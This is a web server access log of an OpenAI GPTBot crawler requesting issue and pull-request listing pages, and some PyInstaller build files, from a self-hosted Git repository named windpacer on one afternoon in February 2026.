"https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:34:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10064] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:34:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10046] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:34:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10067] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:34:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:34:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10220] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:34:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10062] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:34:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:34:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10064] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:34:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:34:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10228] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:34:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:34:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:34:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10057] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:34:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:34:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10044] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:34:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:34:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10228] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:34:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10220] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:34:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:34:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:34:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10171] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:34:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:34:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:34:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10053] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:34:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10048] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:34:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:34:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10046] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:34:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:34:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:34:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10063] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:34:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:34:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:34:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10180] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:34:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10228] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:34:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:34:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10217] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:34:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:34:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10226] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:34:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10047] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:34:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:34:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10063] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:34:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:34:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:34:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10050] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:34:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:34:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10225] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:34:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:34:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:34:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:34:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:34:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 10962] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:19:34:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 10961] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:19:34:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 10962] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:19:34:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 10949] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/struct.pyc" +[17/Feb/2026:19:34:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 10960] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod02_importers.pyc" 